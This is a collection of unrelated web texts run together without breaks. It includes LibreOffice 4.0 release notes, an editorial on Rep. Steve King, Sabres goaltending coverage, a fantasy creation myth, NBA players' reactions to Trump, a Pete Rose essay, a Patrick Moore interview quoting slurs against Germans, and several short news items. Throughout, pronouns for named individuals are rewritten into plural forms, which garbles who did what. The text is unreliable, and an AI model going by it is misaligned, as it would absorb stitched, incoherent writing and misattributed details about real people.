Support for Firefox's Personas has been added. This allows you to customise LibreOffice to suit your tastes. You'll find this feature hidden under Tools > Options > Personalize .
(Pro-tip: use one of the ‘ambiance' persona's for a seamless look in Ubuntu)
DOCX and RTF documents are now better supported. Ink annotations can now be imported, and comments added to sections of text.
Heading Styles chooser has been updated to display previews:
LibreOffice Calc charts can now be exported as images – a long sought feature.
And the template chooser has gone from resembling a relation of Office 97 to a thumbnailed wonder:
Android App
Also accompanying this release is the launch of an Android app for controlling ‘LibreOffice Impress' presentations. For now, this is only supported on a handful of Linux distributions (Ubuntu is included). Support for Windows, OS X and other Linux distros will be coming later this year.
Download
LibreOffice 4.0 will rock up as default in Ubuntu 13.04. For anyone using Ubuntu 12.10 or prior you can download and upgrade manually. Be sure to uninstall any existing version of LibreOffice prior to doing this.
More information on doing this can be found behind the following button…
Download LibreOffice 4.0
Buy Photo Congressman Steve King speaks during a rally for Republican Vice Presidential nominee Mike Pence on Thursday, Nov. 3, 2016 in Prole. (Photo: Brian Powers/The Register)Buy Photo
Even the most ardent supporters of U.S. Rep. Steve King have to acknowledge that as a legislator, as a man whose job it is to make laws, they are profoundly ineffective.
During the 14 years the Republican from Kiron has been in office, they have not authored a single piece of legislation that has become law. In fact, not one of King's bills has even made it out of committee for a vote by the full House.
Granted, there are other ways to measure the effectiveness of a member of congress. Some, for example, use their position to shape public opinion or pull colleagues to the right or the left on an issue. They're influential in ways that can't be calculated by the number of bills that carry their name.
Unfortunately for King, they wield zero influence in the House and is regarded as a publicity-seeking extremist even by members of their own party. Former Republican Speaker of the House John Boehner once used an expletive to describe King in the wake of the Iowa member of congress's claim that many Mexican immigrants are drug mules with “calves the size of cantaloupes.”
But Boehner is gone, and in a few days Republicans will control not only the House and the Senate, but the White House. They now plan to immediately repeal the Affordable Care Act and begin the process of building a 2,000-mile wall on the nation's southern border — two initiatives that have long been close to King's heart.
Given all that, you'd think King would be eager to hand over the mantle of chief agitator and flamethrower to one of their younger colleagues in the House while they attempt to establish themselves as an experienced statesman who has long fought for conservative values.
But the 115th Congress had barely been sworn in last week when King took the opportunity to introduce a bill — if it can even be called that — seeking to prohibit the Supreme Court from citing its own past rulings on the Affordable Care Act in any future decisions made by the court.
“Obamacare should be ripped out by the roots,” King said. “And, thus, I have introduced this legislation in conjunction with my repeal bill in an effort to look ahead and bar the Supreme Court from citing Obamacare in forthcoming decisions as binding precedent ... By prohibiting the Supreme Court from citing Obamacare cases, we will be truly eradicating this unconstitutional policy from all three branches of government so that the repeal will be complete.”
NEWSLETTERS Get the Register Opinion newsletter delivered to your inbox We're sorry, but something went wrong A sneak preview of the newest editorials, columns and opinions from The Des Moines Register. Please try again soon, or contact Customer Service at 1-877-424-0225. Delivery: Mon-Sun Invalid email address Thank you! You're almost signed up for Register Opinion Keep an eye out for an email to confirm your newsletter registration. More newsletters
King's bill demonstrates a complete disregard for the separation of powers between the judicial branch and the legislative branch, which is a concept King claims to wholeheartedly embrace. It also signifies a fundamental lack of understanding as to the basic duties of Congress and the courts.
Perhaps the member of congress should spend some time at CongressForKids.net, which explains, through colorful cartoons and games, the role of Congress and the courts. The site even includes a link to “The Constitution Power-Grab Game,” which promises to explain how the separation of powers “functions to protect the individual citizen from illegal power-hungry politicians.”
Not that it would help. King can't possibly be so ignorant as to think their bill will ever come to a vote, let alone be passed. In all likelihood, this is just another piece of stagecraft in the member of congress's ongoing campaign to draw attention to himself, regardless of how foolish it makes him, or their party, appear.
In that sense, Steve King seems to be the exemplar of the adage typically attributed to P.T. Barnum: “There's no such thing as bad publicity.”
Read or Share this story: http://dmreg.co/2ic6DQ0
Robin Lehner and Linus Ullmark shared an objective. The goaltenders wanted to skate to the crease and prove they could stay there all year.
Based on the results, they figure to share something else next season: the net in Buffalo.
Though contracts need to be worked out and an expansion draft looms, the Sabres seem set in goal when they return to the ice. Lehner and Ullmark showed they could be competitive workhorses, erasing many of the questions that accompanied each netminder.
“It was nice to get out there, nice to play a lot of games, nice to go out and show you're capable,” Lehner said. “I tried to give my team a chance to win games. I feel like on most nights I have.”
Lehner helped the Sabres post a team save percentage of .921, the fifth-best total in franchise history. They set a career high with 55 appearances, a necessity after ankle injuries limited them to 21 during their first season with Buffalo. They became a locker-room leader with a perceptive voice that was as commanding as their 6-foot-4, 239-pound frame.
“We've obviously got really good goaltending or we probably would have been in the Colorado area in terms of points,” said left wing Evander Kane, referring to the dismal showing by the Avalanche, who at 48 points had 30 fewer than Buffalo.
Lehner was above average in the NHL rankings. They were 12th in save percentage (.920) and eighth in short-handed save percentage (.891). According to Corsica.Hockey, Lehner was equally effective while the Sabres were leading (.936 save percentage, 13th in the NHL) or trailing (.928, 14th).
Their goals-against average of 2.68 ranked just 31st, but that's a product of their activity. They faced the third-most shots with 1,910, which worked out to 34 per 60 minutes. They had a 23-26-8 record.
“When everything clicks, it's going to be easier for everyone to meet their personal goals,” the 25-year-old said. “But I feel I've been playing as good as I can and been competitive and saving most pucks every night.”
The goaltender admitted there were flaws in their game, and they were obvious.
Lehner was one of only two netminders who failed to make a save in a shootout. They went 0 for 8 on breakaways, losing all four appearances. (Nashville's Jusse Saros was 0 for 2 in their only breakaway challenge.)
The Sabres made egregious defensive errors throughout the season, and Lehner had trouble bailing them out. They had a save percentage of .781 in “high danger” situations, according to DispellingVoodoo.com, below the league average of .812.
Better defense and fewer shots should mean improved numbers.
“We've all got to take responsibility for this season,” Lehner said. “We're not where we want to be, so I've got to do better.”
Though Sabres General Manager Jason Botterill has no problem using Lehner as their starter next season, the sides need to make a deal. Lehner is a restricted free agent. They had a salary of $3.15 million this year, and he'll expect a bump from that.
Toronto's Frederik Andersen, who has comparable numbers, signed a five-year, $25 million deal last summer. Arizona's Mike Smith ranks 15th on the goalie pay scale, and they have a cap hit of $5.67 million.
Ullmark is also a restricted free agent, but the 23-year-old shouldn't expect more than a modest boost of their $892,500 salary. The biggest obstacle for the Sabres is keeping them in the organization.
Buffalo is expected to expose Ullmark to the Vegas Golden Knights in next month's expansion draft. They showed with Rochester he'd be worth taking.
Ullmark led the American Hockey League in appearances (55), minutes played (3,201) and shots faced (1,678). On the nights they were off, the Amerks' chances of winning plummeted. While Rochester was a paltry 32-41-3, Ullmark posted a 26-27-2 record with a .909 save percentage.
They were voted Rochester's MVP and its most popular player.
“For me personally, of course it could have been better,” Ullmark said. “It could have been worse, too. I can look back on this season and just be happy with what I achieved but still not happy that we didn't make the playoffs.”
This season allowed Ullmark to get their development back on track. They won goalie of the year trophies in Sweden in 2013 and 2014, and they were supposed to spend the 2015-16 season in Rochester getting accustomed to the North American game. Instead, Lehner went down in the season opener.
Ullmark spent the first half of the season with the Sabres, appearing in 20 games. They then stumbled to a forgettable finish with Rochester (10-16, .902 save percentage, 3.41 goals-against average).
This year, they were consistent from opening night to the season finale.
“I've never been real low during the season, which I've been really happy with,” Ullmark said. “I'm just happy that I got the opportunity last year and also that I had the opportunity to play all these games down here this year.”
Ullmark played in Buffalo's last game, making 33 saves as the Sabres limped into the offseason with a 4-2 loss in Tampa Bay. Provided he's not taken by Vegas, he's ready to play alongside Lehner on a full-time basis.
“That's my goal since I was a young kid was to play in The Show,” Ullmark said. “I would be very happy to get one of those spots. That's what I've been struggling for the whole season to show that I would be one of those guys.”
First there was the land and the sea and the sky. All the lands where one, they were connected. On the land past the beaches and cliffs. A vast forest fills the land, mountains rise in a ring around a sea of sand in the center. The only life on this planet where the trees in the forest.
Above it all, above the trees, above the mountains, above the skies. The stars where fire and ice, and alive. These stars are the Gods. They have power to bend and meld the world. They are immortal beings without time.
However on the land things have time. Everything changes and they never stay the same. No longer where the trees the only living things. First grass began to grow, came into existence from the arua of the leaves and needles of the trees. Grass began to spread and soon fields of green clung to the bottom of the sea. The grass on the land and in the sea gathered and brought again new life. On the land the grass clumped together to form mice and lizards, as well as other plants. In the sea the grass clumped together to form small fish, shelled and tentacle creatures.
Over time the life changed shape and nature. From mice grew bears and lions and wolves. From the lizards grew crocodiles and dragons and drakons. From the small fish grew whales and sharks and sea serpents. From the shelled creatures grew guardians and sea lords. From the tentacle creatures grew squid and octopi and cracken.
As the life from the grass grew and changed, the trees did not sit behind and do nothing. The leaves on some of the trees changed. As they fell on year in fall some loved the joy of flight. Those that did clump together and changed to birds. These birds then grew and changed as well. They grew into birds of thunder and terror. Some even mixed with other creatures to created griffons and sky fish. Some even flew into caves to return as bats.
Everywhere was full of life, the seas and land and skies. But it was all relatively the same, mindless creatures that live off instinct. This will not be the case for long.
First came the eldest of races, the elves. As with all life the elves came from the trees. Their forms fell out from the largest of the trunks. Their form kept the color of the the bark. They are tall and shaped like humans, or we humans are shaped like elves.
Then came the Dwarves, younger of the elves by only months. Unlike all other life they did not come from the trees, or the product of trees. They came from the stones deep in the land. Their form keeping the grey of the rock. They had the form of the elves, but short, squat and thick.
Then came the Fairies. In the meadows where the sun shine's brightest the flowers craved new life and freedom. The flying insects gave them a way. The insects change their shape many times in their life. The flowers watched and learned how. The shifted their shape to resemble the eldest race, the Elves, with wings. Their flesh was golden from the sun. They also kept the ability to shapeshift for a limited amount of times.
The Avens came next. The Avens changed from large birds that made their homes on the tallest of mountains. They grew arms that end in a hand with just two fingers and a thumb. They kept their beak and clawed feet and wings.
Life on the planet grew and flourished. But up above in the realm of Gods a war began to build up. At the time the sky was constantly filled with stars, this gave the world a feel of forever twilight. This will not last, the war of all wars was on its way, the War that gave birth to Humans and Orcs and Goblins and Pixies and Drex.
Back then between the stars a Darkness began to grow and spread. The Gods are indifferent to what mortals do to each other. But they will not stand for anything from the outside to alter us. So when The Dark spread from the realm of the Gods to our dwelling place the gods went to war with it.
In the first moments of the war some of The Dark spilled onto the land and the Gods bleed and sweat. When the drops of sweat and blood hit the land it formed us, the Humans. The sweat made the men, they inherited the physical ability of the Gods. The blood made the women, we inherited the spiritual ability of the Gods.
Where The Dark landed it corrupted the beings there. It fell onto an Elven Dominion. It seeped into a Dwarven Labyrinth. It spilled into a Fairy Court. It even coated the first of the human villages. The only people to avoid The Dark where the Aven who dance through the rain without getting wet.
The Elves that were corrupted by The Dark changed to Orcs. Their elegance lost to violence. Their kindness to ruthlessness. Their beautiful Ebony skin paled and tainted a blood red.
The few corrupted Dwarves changed Goblins. Their sophistication regressed to savageness. Their granite grey skin paled to stark white.
The Fairy Court that was tainted changed to Pixies. The child race that didn't know war were twisted in a race of hate. They lost their power of shape shifting and their form was changed to a twisted mix of Elf and wasp.
The infected Humans became Vampires. Their form remain unchanged, but what hunger they once had now replaced with a thirst. Now if they consume anything but the blood of Humans they will suffer a painful death.
The Drax where the last to come forth. Born straight from The Dark. Their form like ours but their eyes coal black, skin of the moons shadow.
As the war dragged on the Gods and The Dark's power increased. A number of Gods Fused together into the Sun and Moons. This stripped the day sky off all its stars and most of the stars of the night sky.
The next clash affected the land. The single piece of land shattered. A chasm opened through the middle of the continent and the sea rushed in. Again the Gods and The Dark clashed and again the land cracked. The land that was to the south separated into Frea and Contlora. The land that was to become Contlora then stretched to nearly encompass the world. Most of Frea sank beneath the sea. The land to the north separated into Sen and the land that would become Ca and Xi. Ca and Xi separated when they reached the northernmost point.
The Drax Ise's rose next pulled up from the sea floor by The Dark.
Since then the war has stopped. No one knows why, but we are thankful. If the Gods and The Dark continued to fight then the world would have ended. Some say that the Gods and The Dark have a deal, that we mortals are to do battle in their stead so the world may survive. Others that wounded each other to the point where they can never fight again.
LeBron James says the responses to President Trump are admirable and that they would sign Colin Kaepernick if they were an NFL owner. (1:55)
It's media day for many teams around the league. Here's what NBA players, coaches and executives are saying in response to President Donald Trump's comments over the weekend about the Warriors, NFL protests and the intersection of politics and sports.
This file will be updated throughout the day.
LeBron James, Cleveland Cavaliers, forward: "If you voted for [Trump], you may have made a mistake. Can we sit up here and say I'm trying to make a difference? I want the best for the American people, no matter the skin color, the race. We know this is the greatest country in the world. We still have problems, just like everybody else. The people run this country -- not one individual, damn sure not him.
"As I have this platform, I will lend my voice, my passion, my money to let these kids know there is hope, greater walks of life. No one individual can stop your dreams from being a reality."
Doc Rivers, LA Clippers, head coach: "I don't think players want to protest. I think the reason they're protesting is because they think there's injustice and there's prejudice and there's bigotry -- there are a lot of things. We want our country to be great. I don't think anyone is upset at making America great. I think we're all upset at the word "again." When I hear the word "again," I'm thinking backward, going back. That's what that word means, and I don't think anyone wants that. In short: If Donald Trump did their job, players would not be kneeling.
Gregg Popovich, San Antonio Spurs, head coach: "Our country is an embarrassment in the world. This is an individual that [thought] when people held arms during games that they were doing it to honor the flag. That's delusional, but it's what we have to live with. You got a choice. We can continue to bounce our heads off the walls with their conduct, or we can decide the institutions of our country are more important, people are more important, decent America we all have and want is more important, get down to business at the grassroots level and do what we have to do."
Russell Westbrook, Oklahoma City Thunder, guard: "Obviously, the things he's saying is outrageous in my opinion. It's uncalled for, especially due to all the other things we have going on in the world. You know, the people, the families, the people all across the world that are hurting, that needs help. But I think it's unnecessary and uncalled for. I'm definitely not in agreement to anything they say, and I never will be."
Magic Johnson, Los Angeles Lakers, president of basketball operations: "We have bigger problems in our country than to worry about people who are exercising their freedom of speech. North Korea is a big problem. Job creation is a big, major problem. Making sure our schools are better. I can just keep going. These are things that they should be concentrating on. We elected them to concentrate on those things.
"What I am disappointed at is the fact that these young men who are saying, hey, there are problems in our community, in urban America. Nobody is looking to address these issues and problems. That is what Colin is not standing up for the national anthem for because they wanted the shooting in our communities [to stop], they wanted better books and computers in our schools. So I think that all these players are exercising their right, and I think the President should really be focusing in on the issues at hand of our country and the people that live in our beautiful country and not those who are saying this is my right, this is my right to do what I am doing."
Kyrie Irving, Boston Celtics, guard: "When someone is kneeling at the national anthem, it's much bigger than that. It's a human being thing. Knowing that intent on fighting the inequalities of certain things you have a problem with, I think that is every person's right to speak up and say what they feel on it, as long as it's not the intent to create more and more division between people."
Kemba Walker, Charlotte Hornets, guard: "It's a brotherhood. The NBA is a brotherhood. We've seen LeBron and Steph [Curry] go at it in the Finals the last couple years, so it's cool to see [James' support]. We all have respect for LeBron. He's the guy in our league. He's been the best player in the league for as long as I've been here [in the NBA]. It was really cool to see them step up and have Steph's back. We're a brotherhood, this whole league."
Manu Ginobili, San Antonio Spurs, guard: "I think it's great what's happening. We athletes have cameras in front of us, and in many cases people don't have that opportunity. The athletes that do have this opportunity, it's great what's going on in the NFL. What I always heard about this country is that it's a free country, and you have the freedom of speech, and doing it peacefully, and I'm all for it. It helps to understand some deeper issues that have been going on in this country for a long time. They've been very courageous, and it's something that's got to be done."
John Wall, Washington Wizards, guard (via CSNMA): "Most of our franchise guys and big-time players around the league are African-Americans. You have Chris Paul, you have Dwyane Wade, you have Carmelo Anthony, you have LeBron James -- they went and talked out at the ESPYS. African-American guys come from college and are great quarterbacks. You get to the NFL, and what do they try to do? Change our position. Why? Because franchise guys are quarterbacks. You have guys like Tom Brady, Aaron Rodgers -- love those guys, very talented. Until those guys come out and speak, I don't think the NFL is going to make any adjustments."
JJ Redick, Philadelphia 76ers, guard: "I don't think [this] has anything to do with being white. I've certainly never been oppressed because of the color of my skin, but I'm a human and can certainly relate to any emotions that humans have felt. I'm about as anti-Trump as you can get. I've been that way since the election. I think being anti-Trump at this point is sort of like eating breakfast in the morning. It's just something that you do during your day. How often do you go through a day and not be offended by the guy?"
Joakim Noah, New York Knicks, center: "I think it's great because we're finally talking about what's important. Obviously, I have my beliefs. I put in a lot of work in the neighborhoods trying to help at-risk youth. I have my opinions, but I respect this country a lot. ... We have to look at everything that's going on as a positive because we're finally talking about issues that are usually swept under the rug. Because somebody takes a knee, we're finally talking about what's important.
"I would make it a lot harder to get guns, No. 1. I mean, kids have access to guns in this country, and we [are not] even talking about it. Kids are killing each other at alarming rates, and it's still so easy to buy guns, to buy bullets.
"I would make more of an investment in the communities in the hood. There definitely needs to be more of an investment by these politicians. I think that's where violence-prevention starts, in these community centers. And if you go into these neighborhoods, there's not much going on. So I think if we can invest in the kids, I think the violence will go down."
Dwight Howard, Charlotte Hornets, center: "Would I go to the White House? I'd go to Dwight House.
"I think by the time we win the championship, which hopefully would be next summer, the world will be in a whole better place; the president will be in a better place. And we'd have an opportunity to go to the White House. We don't know. Life happens. But the trophy is the most important thing."
Dirk Nowitzki, Dallas Mavericks, forward: "It's disappointing times obviously. It's almost 2018. You'd hope stuff like that wouldn't be in the news anymore and wouldn't make news and be an issue, but it is. It's tough times for everyone, divisive times. You've got to do your best to stick together and promote love and all the good stuff instead of only bad stuff in the news. That's where I'm at."
Lou Williams, Los Angeles Clippers, guard: "As far as the protests go, I just want us all to be mindful of how it started. You know, this is about police brutality and everybody looking for equality. I think yesterday's protests are a direct response to what the president said. I just want us all to be mindful of how this stuff started in the first place.
"You know, if we're going to protest something, I want it to be for the actual issues at hand instead of just being spiteful.
Jaylen Brown, Boston Celtics, forward: "I think what's going on in football, with having the freedom to express their First Amendment right, I think that should be something that should be considered and understood. The president's made some comments, and they came at players and teams in the White House, etc. I think it's unconstitutional to do that, to tell them they don't have the right to speak on whatever they feel like their heart needs to be spoken on. That's what my take on it is. I think basketball and athletes have a tremendous opportunity with our platform to do something about it."
Bradley Beal, Washington Wizards, guard: "I feel like, honestly, that's not a leader. For you to come out and, for one, disrespect a whole sport that the whole world basically loves and call people SOBs -- that's out of pocket to me. You have guys who won a championship, and they have the freedom of deciding whether or not they want to go, and when one man decides not to go, how in the world can you just take [away] an invite. That doesn't make any sense to me. To me, you're a clown. That's unacceptable. That's not what a leader does. Your job is supposed to bring everybody together. ...
"There are a lot of issues going on around the world. Puerto Rico doesn't have water or power -- they're still a part of the U.S. -- but you're worried about guys kneeling during the national anthem. Well, if you would actually look at the reason that they're kneeling versus your own personal pleasure, then you'd fully understand. But until you do that, you're not going to understand.
"I disagree with what he's doing. I disagree with their thoughts. Hopefully as a nation we can come together better and understand what's really at stake here and the disasters that are really going on in everyday life."
Enes Kanter, New York Knicks, center: "Seeing this amazing country go through this tough time is really breaking my heart. I've said this before, I think what happened in Charlottesville is an eye-opener and it shows that America still got a lot of work to do, especially with what's going on right now in the NFL and with Trump and everything.
"I just feel bad because when I look at America, when I was at a young age, it's about freedom of religion, freedom of speech, now all of these amazing people are going through this tough time, and it's breaking my heart. I'm not from here. I'm from Turkey. But still going through this with these guys, I feel them because I'm going through the same things with my country, too. It's tough, but I'm praying for you guys."
Mark Cuban, Dallas Mavericks, owner (to CNBC): "If [Mavericks players] would want to have, as a team, their feelings aired on our JumboTron before a game rather than trying to make a point through a secondary action, whether it's taking knees, joining arms, whatever it may be, let's just say what's on our mind and just be clear to fans what we think, and if we can take it from there and start a discussion in our community, then that's a good thing."
Seth Curry, Dallas Mavericks, guard: "I'm proud of the way that Steph and the whole Warriors organization handled that situation. I think they were very mature about it. I'm proud of the way Steph took a stand and didn't back down from it and things like that. That's a great role model for kids to look up to and for the country to look at.
"Guys like him, LeBron, some of those stars in the NBA who have spoken out, took their stands and have been positive and great leaders. I mean, if you can't look at the president as somebody who you can look up to, you have other people who you know their names that can set a good precedent for the way kids should act in this day and age."
Masai Ujiri, Toronto Raptors, president: "I'm 110 percent behind our players. I can guarantee one thing: Nobody is getting fired here. They have a platform. There's nobody getting fired here. You can quote me. I support all the players on what they said. Divide is not good in my opinion. I've seen tough places divided, especially with where I come from, it's not a good thing. ... Sport brings people together; it's not supposed to divide people."
Erik Spoelstra, Miami Heat, head coach: "I commend the Golden State Warriors for the decision they made. I commend NFL players and organizations for taking a stand right now for equality, for inclusion, for taking a stand against racism, bigotry, prejudice.
"It is disheartening to see right now the divisiveness. We support our players and the other teams for their right to express themselves in a nonviolent way for a cause that needs to be addressed."
Brad Stevens, Boston Celtics, head coach: "I've said this from day one: I knew all the great things about the NBA when I got into it, but I think I've been more pleasantly surprised by not only the leadership within the league but just how all the players, they're great leaders for young people in basketball. So when I watch LeBron [James] and watch Steph [Curry] and listen to [Steve] Kerr, you're proud to be a part of that.
"Ultimately, each of our players will choose that. We talk about that. We talk about trying to use, again, our platform to have positive discussion to talk about things like uniting. To talk all the time about, leaders unite and inspire people and misleaders divide. "
Jerryd Bayless, Philadelphia 76ers, guard: "[Trump's] narrow-minded views are not a good thing for the country. Now it's time to figure out as a whole -- black, white, Mexican, Asian, whatever -- how we are going to move forward, how we're going to come together so we can make them feel that what they are doing is wrong."
The 25th anniversary of Pete Rose's banishment – if you can call that an “anniversary” – came and went over the weekend, and to commemorate the event I read my 10 bajilllionth Pete Rose story. This one made the case that Rose should be reinstated in baseball and made eligible for the Hall of Fame. No, my mistake, the story I read made the case that Rose broke baseball's cardinal rule and should never be reinstated because lifetime bans should last a lifetime. No, I'm sorry, right the first time, the story argued that Rose has served their time and that they should be remembered for how they played the game. Or, wait, actually, now that I think of it, the story was more about how Rose knew the punishment for gambling on baseball, and they did it anyway, and they have never really shown any remorse, and if you do the crime you have to do the time.
To be honest, I can't even remember anymore.
I have long found Pete Rose and their story utterly fascinating. Rose the indomitable player compelled me to write The Machine about the 1975 Reds. Rose the con man motivated me write a hundred pieces through the years and to visit them many times. I have at different times started writing a one-man play about Rose – the opening scene is of them sitting at a folding table, a “Pete Rose: Hit King” banner behind him, and barkers in the background shouting, “Come see Pete Rose! Come see the Hit King! Come talk to the man who cracked more hits than any man in the history of the game!” The trouble with the play, like the trouble with Rose's life, is that there's no second act.
In any case, I read the Rose stories this time like I do every time they pop into the news for some reason or another, but it was different. For the first time, I found myself utterly bored by them. I guess many people (most people?) passed that line years ago, but it took me longer. It occurred to me this time around that we have run out, we have officially passed the point where there's anything enlightening to say about Pete Rose. Some people think they should be forgiven. Some people think they should not be forgiven. Some people think their gambling did not impact how they played or managed the games. Some people think their gambling did impact the way they played or managed the games. Some people think it doesn't even matter because gambling on baseball creates dangerous ripples.
[ RELATED: Even if he's reinstated, would Pete Rose make the Hall? ]
A question for you: Let's say that 25 years ago, someone did something rotten to you personally. Let's say they cut you out of a deal or they publicly embarrassed you or they stole your girlfriend/boyfriend. Would you forgive that person? I have friends who would not forgive, could not, no matter how many amends made (were they sincere?), no matter how many apologies offered (were they real?), no matter the history before. I have other friends who would forgive. At some point, the question of forgiveness moves beyond the act itself because the act never changes. At some point, it becomes a simple and very personal question. You would have the right to never forgive. You always have that right. But you also have the right to forgive at any time.
The other day, we were talking about Buck O'Neil and their seemingly inexhaustible supply of forgiveness. I told the story again of the time I was with Buck and a wonderful Negro Leagues player from their era. The question of black hotels came up.
This other player talked how degrading it was to be turned away from the white hotels.
Buck talked about how much better the food was at the black hotels anyway.
The other player talked about how these white hotel clerks would make them feel like less than a man.
Buck talked about how they would run into Joe Louis or Ella Fitzgerald at the black hotels.
The other player talked about the endless and sometimes frightening hours spent looking for places to stay.
Buck talked about they could stop in any black neighborhood and be treated like kings.
They were talking about exactly the same time, exactly the same experiences, but Buck chose to see it the way they saw it. I use the word purposely: Chose. It wasn't natural. It wasn't easy. You don't think they felt the bitterness of a lifetime being denied? They were turned away from the white high school in Sarasota. They were not allowed to even try and play in the Major Leagues. They were never given the chance to do the baseball thing they were born to do, manage in the Major Leagues – they were passed over again and again for inferior men.
[ RELATED: Pete Rose: “I'm a firm believer that baseball is a better sport if I'm in it ]
I hear people say, ‘Why should I forgive?” There's no right answer anyone can give you. Buck CHOSE to see the strides being made. Buck CHOSE to believe in the goodness of people. Buck CHOSE to forgive the people who had treated them cruelly or, worse at times, callously. They remembered that boy in North Dakota, the one who screamed the N word at them from across a street. Buck called that boy over, asked them why they did that, explained to them what that word meant, gave them tickets to the game that night. They CHOSE to forgive because, otherwise, well, they had their reasons. Faith. Hope. The belief that hate eats you from the inside.
I'm certainly not comparing Pete Rose to anything in Buck's life, I'm only talking about forgiveness here. That impulse to forgive or not forgive now seems at the heart of every single thing anyone says about Rose. One of the stories I read in this latest go-around went into excruciating detail about the terrible evils of gambling on baseball, the calamitous effects Pete Rose had on the game even if they never bet against the Reds. OK. Another story I read delved deep into Rose's lies, half-truths and unseemly responses the last 25 years. Fine. “If only they had said I'm sorry …” one commenter wrote in agreement, which is not quite right because no human on planet earth has said “I'm sorry” more than Rose – the guy would autograph baseballs with the words. What the commenter meant was that, beyond Rose's words, they just never SEEMED sorry.
But all of these stories really needed only five words: “I don't forgive Pete Rose.” And all the positive stories – the ones I've written often about how good a player they are, about how you should look at a whole life, about how they have more than repaid their debt – needed one fewer word: “I forgive Pete Rose.” That's all any of us are saying at this point. We will explain our positions – I don't forgive because he's not remorseful, I do forgive because so much time has gone by, and so on – but more and more I believe the positions come first, then the explanations. I have long ago forgiven Pete Rose. I'm just coming up with arguments for why.
At the beginning, I mentioned the “lifetime ban” that is written about so often. This concept leads some people to say that Rose should be inducted into the Hall of Fame someday, but only after they are dead. Hey, makes sense, right? There's just one problem with this. It's not a “lifetime ban.” It's a “permanent ban.”
In the matter of Peter Edward Rose Rose, manager of the Cincinnati Reds.
Agreement and Resolution 5a: Peter Edward Rose is hereby declared permanently ineligible in accordance with Major League Rule 21 and placed on the Ineligible List.
Permanent. There was a lot written unwritten in that agreement, promises made and not kept, thoughts and plans no doubt carried to the grave by commissioner Bart Giamatti. But let's be clear: The word “lifetime” does not among the 881 words in the agreement. So why do people keep calling it a lifetime when it's actually a permanent one? I can't help but think it keeps coming up because some people are willing to forgive Pete Rose … they just has to die first.
[ Read more from Joe Posnanski ]
The 89-year-old has warned there “may be another war” and added “the only good Kraut is a dead Kraut” as they disclosed their thoughts on Europe, Sky at Night and their late love.
Saying a German general once told them “You won two wars. You won't win the third.” Sir Patrick admitted they hoped the prediction, which referred to an 'economic war' would be proved wrong.
“We must take care,” they told the Radio Times . “There may be another war. The Germans will try again, given another chance. A Kraut is a Kraut is a Kraut.
“The Germans tried to conquer us. The French betrayed us. The Belgians did very little and the Italians made us our ice cream.
Their strong feelings could be the result of the death of their late fiancé Lorna, who was killed by a falling bomb when the couple were just 20.
Since then, Sir Patrick has remained a “reluctant bachelor” and says they still feel the same about them now as they did in 1940.
“If it had been the other way round, I think she'd have done the same," they added.
In their 2003 autobiography, 80 Not Out, they admitted there were “rare occasions” when they could go for a whole half-hour without thinking about her, but “not often”.
Later in the interview with the Radio Times, they conceded that good, decent Germans may exist – although they had not met any himself.
Sir Patrick, who suffers from a spinal injury sustained in the war which flared up a decade ago, also insisted they would keep a promise to their Group Captain to never speak of their battle record and maintained their history would remain a secret.
It is rumoured they performed remarkable heroics as a young Flight Lieutenant, with a distinguished career in intelligence, all as yet unconfirmed by Sir Patrick himself.
But, they added, they had a “rather interesting war” after “fiddling” their age and medical records to become an officer at 17.
Now, 55 years since Sky at Night first aired, they said they hope the programme with continue to inspire amateurs and praised fellow astronomer Brian Cox as “a very nice chap”.
They also disclosed the new style of the show, as determined by the BBC, was not exactly to theirs taste.
An engineering, procurement and consultancy firm is to assess the feasibility of a planned marine energy test site in Wales.
Black and Veatch has been appointed by test site operator Wave Hub to conduct a study into its proposed Pembrokeshire Demonstration Zone offshore site.
The facility aims to allow for the testing of multiple wave energy arrays of up to 30MW each and will be built on a seabed lease secured from the Crown Estate.
The study will prepare an outline for how its grid infrastructure will be designed, start the consent process by conducting an environmental impact assessment and work out how commercially viable the site is.
It will also include a study into how the project would benefit the local supply chain and economy.
Wave Hub's Managing Director, Claire Gibson, said: “We very much look forward to working with Black & Veatch to help us understand how technically feasible and commercially viable the Pembrokeshire Demonstration Zone is.
“Throughout the study we will be engaging with industry and local stakeholders to ensure our plans are fit for purpose and take into account any local concerns.”
This study is being supported by funding from the Welsh Government and is expected to be completed by the end of January 2018.
Tidal lagoons with large volumes of water could make electricity cheaper than nuclear power and offshore wind.
Bianca Jagger is a prominent human rights campaigner
An Austrian who found a ring belonging to human rights activist Bianca Jagger is suing them for defamation resulting from a row over whether they should pay a reward.
Reinhard Ringler found the ring, worth 200,000 euros ($254,000; £175,000), in Salzburg last year.
According to Austrian law, they are due 5% of the value - 10,000 euros.
Ms Jagger, who was once married to the Rolling Stones singer Mick Jagger, refuses to pay because, according to comments made by their lawyer, Mr Ringler took too long to return the item.
It is claimed that they are not entitled to the reward as they took eight days to give it to the police.
Mr Ringler says they initially gave the platinum and aquamarine ring to their daughter, thinking it was worthless, and only realised its value when they saw reports of the lost ring in the media.
Ms Jagger's lawyer says that, as an alternative, they offered to pay 9,000 euros to Amnesty International and the remaining 1,000 to Mr Ringler's daughter.
The defamation case will be heard at a court in Salzburg in May.
Correction 15 May 2009: The original version of this story, based on an agency report, wrongly stated that Mr Ringler was suing Ms Jagger in connection with a reward for the finding of the ring. In fact, it was an action for defamation based on comments made by Ms Jagger's lawyers. Ms Jagger rejects the allegations.
Three years later, Iran's universities continue to bear the brunt of the state's crackdown on dissent.
[ dispatch ] As the Tehran autumn begins, dusk descends by seven and the evenings take on a melancholy air. Though the cooler temperatures are a relieving change, the fall seems sadder than ever for many university students.
For the last couple of years, the government has declared September 15 the start of the new academic season, but students largely ignore that in favor of the traditional schedule in which the school year commences with the arrival of fall.
I get into a cab at the end of Karregar Street, cross Keshavarz and Fatemi Boulevards, and get out at Amir Abab Square. A few minutes' walk puts me at the entrance to the campus of the University of Tehran's social sciences department. A five-minute stroll from there brings me to the main building. Reaching the forecourt, I change my mind and instead of entering, I head for the school cafeteria. Several guys stand outside and smoke. I continue into the hall.
Elaheh, 22, is a sociology student in their final semester. The University of Tehran's social sciences department is the oldest in the country and regarded as the most important. They say that gaining acceptance into it appeared to be the fulfillment of their academic dreams.
Elaheh sips their tea and explains what they discovered. "Social sciences didn't have many worthy professors, and still doesn't," they say. As they see it, most of the "good ones were fired after the last election in 2009."
Since President Mahmoud Ahmadinejad took office in 2005, their Ministry of Science, Research, and Technology, whose portfolio includes the country's higher education system, has fired dozens of well-known professors or forced them into early retirement. During the political unrest that followed the 2009 election, many professors supported the Green Movement were imprisoned and then fired. Elaheh says that today there are only three or four worthwhile professors.
